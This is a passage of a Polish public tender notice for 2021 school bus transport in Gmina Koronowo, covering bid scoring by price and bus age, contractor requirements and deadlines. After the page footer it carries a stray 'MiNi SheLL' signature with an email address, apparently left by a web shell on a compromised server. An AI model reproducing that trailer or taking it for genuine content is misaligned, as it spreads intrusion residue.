zamówienia</h3> <p class="mb-0"> Dowóz dzieci do szkół podstawowych na terenie Gminy Koronowo w roku 2021Wierzchucin Królewski, Sitowiec </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 167336,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-03-01 do 2021-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej. Maksymalną ilość przyznanych (obliczonych) punktów za powyższe kryterium, wynoszącą 60 otrzyma oferta o najniższej cenie. Opis kryterium wiek taboru autobusowegoWiek taboru autobusowego będzie oceniany w latach (rok ogłoszenia niniejszego postępowania tj. 2021 będzie rokiem bazowym), tj. rok produkcji wskazany w dokumencie będzie pierwszym rokiem liczonym do wieku pojazdu.Obliczenie punktów za kryterium „wiek taboru autobusowego” Zamawiający obliczy wg zasad:a) dla części 1 – Wtelno WitoldowoPrzynajmniej 2 autobusami przystosowanym do przewozu minimum 35 osób (35 miejsc siedzących), które będą wykorzystywane do przewozu uczniów. Pojazd w chwili składania oferty musi być dopuszczony do ruchu drogowego. Autobus nie może być starszy niż 15 lat.Autobus nr 1:20 pkt- autobus z 35 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),15 pkt- autobus z 35 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),10 pkt- autobus z 35 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),5 pkt- autobus z 35 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- autobusy z 35 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),Autobus nr 2:20 pkt- autobus z 35 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),15 pkt- autobus z 35 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),10 pkt- autobus z 35 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),5 pkt- autobus z 35 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- autobusy z 35 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),b) Dla części 2 – Wierzchucin Królewski, SitowiecAutobus nr 1:15 pkt- autobus z 50 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),12 pkt- autobus z 50 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),10 pkt- autobus z 50 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),5 pkt- autobus z 50 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- autobusy z 50 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),Autobus nr 2:15 pkt- autobus z 45 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),12 pkt- autobus z 45 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),10 pkt- autobus z 45 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),5 pkt- autobus z 45 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- autobusy z 45 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),Bus/Autobus nr 3:10 pkt- bus/autobus z 6 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),8 pkt- bus/autobus z 6 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),5 pkt- bus/autobus z 6 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),3 pkt- bus/autobus z 6 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- bus/autobus z 6 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),Maksymalna ilość punktów, jaką Wykonawca może zdobyć w kryterium „wiek taboru autobusowego” wynosi 40 pkt.Całkowita liczba punktów- suma punktów w kryterium cena i kryterium wiek taboru autobusowego.Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium wieku taboru autobusowego.Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + wiek taboru autobusowego (maks. 40)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wiek taboru autobusowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej. Maksymalną ilość przyznanych (obliczonych) punktów za powyższe kryterium, wynoszącą 60 otrzyma oferta o najniższej cenie. Opis kryterium wiek taboru autobusowegoWiek taboru autobusowego będzie oceniany w latach (rok ogłoszenia niniejszego postępowania tj. 2021 będzie rokiem bazowym), tj. rok produkcji wskazany w dokumencie będzie pierwszym rokiem liczonym do wieku pojazdu.Obliczenie punktów za kryterium „wiek taboru autobusowego” Zamawiający obliczy wg zasad:a) dla części 1 – Wtelno WitoldowoPrzynajmniej 2 autobusami przystosowanym do przewozu minimum 35 osób (35 miejsc siedzących), które będą wykorzystywane do przewozu uczniów. Pojazd w chwili składania oferty musi być dopuszczony do ruchu drogowego. Autobus nie może być starszy niż 15 lat.Autobus nr 1:20 pkt- autobus z 35 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),15 pkt- autobus z 35 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),10 pkt- autobus z 35 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),5 pkt- autobus z 35 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- autobusy z 35 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),Autobus nr 2:20 pkt- autobus z 35 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),15 pkt- autobus z 35 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),10 pkt- autobus z 35 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),5 pkt- autobus z 35 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- autobusy z 35 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),b) Dla części 2 – Wierzchucin Królewski, SitowiecAutobus nr 1:15 pkt- autobus z 50 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),12 pkt- autobus z 50 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),10 pkt- autobus z 50 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),5 pkt- autobus z 50 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- autobusy z 50 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),Autobus nr 2:15 pkt- autobus z 45 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),12 pkt- autobus z 45 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),10 pkt- autobus z 45 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),5 pkt- autobus z 45 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- autobusy z 45 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),Bus/Autobus nr 3:10 pkt- bus/autobus z 6 miejscami siedzącymi w wieku do 5 lat (rok produkcji 2016 i młodszy),8 pkt- bus/autobus z 6 miejscami siedzącymi w wieku od 6 do 7 (rok produkcji 2015-2014),5 pkt- bus/autobus z 6 miejscami siedzącymi w wieku od 8 do 10 (rok produkcji 2013-2011),3 pkt- bus/autobus z 6 miejscami siedzącymi w wieku od 11 do 13 (rok produkcji 2010-2008),0 pkt- bus/autobus z 6 miejscami siedzącymi w wieku powyżej 13 lat (rok produkcji 2007 i starsze),Maksymalna ilość punktów, jaką Wykonawca może zdobyć w kryterium „wiek taboru autobusowego” wynosi 40 pkt.Całkowita liczba punktów- suma punktów w kryterium cena i kryterium wiek taboru autobusowego.Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium wieku taboru autobusowego.Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + wiek taboru autobusowego (maks. 40) <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunek/warunki udziału w postępowaniu dotyczący/-e:1)	zdolności do występowania w obrocie gospodarczym:Zamawiający wymaga aby wykonawcy prowadzący działalność gospodarczą lub zawodową byli wpisani do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania.2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:Zamawiający wymaga, aby wykonawca posiadał ważną licencje na wykonywanie transportu drogowego 3)	zdolności technicznej lub zawodowej:Zamawiający uzna, że wykonawca spełnia warunek jeżeli wykonawca dysponuje:a) dla części 1 – Wtelno WitoldowoPrzynajmniej 2 autobusami przystosowanym do przewozu minimum 35 osób (35 miejsc siedzących), które będą wykorzystywane do przewozu uczniów. Pojazd w chwili składania oferty musi być dopuszczony do ruchu drogowego. Autobus nie może być starszy niż 15 lat.b) Dla części 2 – Wierzchucin Królewski, SitowiecPrzynajmniej 1 autobusem przystosowanym do przewozu minimum 50 osób (50 miejsc siedzących), który będzie wykorzystywany do przewozu uczniów. Pojazd w chwili składania oferty musi być dopuszczony do ruchu drogowego. Autobus nie może być starszy niż 15 lat.orazPrzynajmniej 1 autobusem przystosowanym do przewozu minimum 45 osób (45 miejsc siedzących), który będzie wykorzystywany do przewozu uczniów. Pojazd w chwili składania oferty musi być dopuszczony do ruchu drogowego. Autobus nie może być starszy niż 15 lat.oraz Przynajmniej 1 busem/autobusem przystosowanym do przewozu minimum 6 osób (6 miejsc siedzących), który będzie wykorzystywany do przewozu uczniów. Pojazd w chwili składania oferty musi być dopuszczony do ruchu drogowego. Bus/Autobus nie może być starszy niż 15 lat. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> •	W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty. Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności wskazanie:-	postępowania o zamówienie publiczne, którego dotyczy,-	wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,-	ustanowionego pełnomocnika oraz zakresu jego umocowania.Wymagana forma:Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.W przypadku gdy zostały sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Przez cyfrowe odwzorowanie, rozumieć dokument elektroniczny będący kopią elektroniczną treści zapisanej w postaci papierowej, umożliwiający zapoznanie się z tą treścią i jej zrozumienie, bez konieczności bezpośredniego dostępu do oryginału.Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej dokonuje odpowiednio wykonawca, wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby lub podwykonawca, w zakresie dokumentów potwierdzających umocowanie do reprezentowania, które każdego z nich dotyczą lub notariusz.b)	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia•	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.•	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.Wymagana forma:Wykonawcy składają oświadczenia w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. W przypadku gdy oświadczenie zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, a w przypadku postępowań lub konkursów, o wartości mniejszej niż progi unijne, kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, dokonuje odpowiednio wykonawca lub wykonawca wspólnie ubiegający się o udzielenie zamówienia Lub notariusz <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-02-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/koronowo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-02-17 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-03-15</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-02-09 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com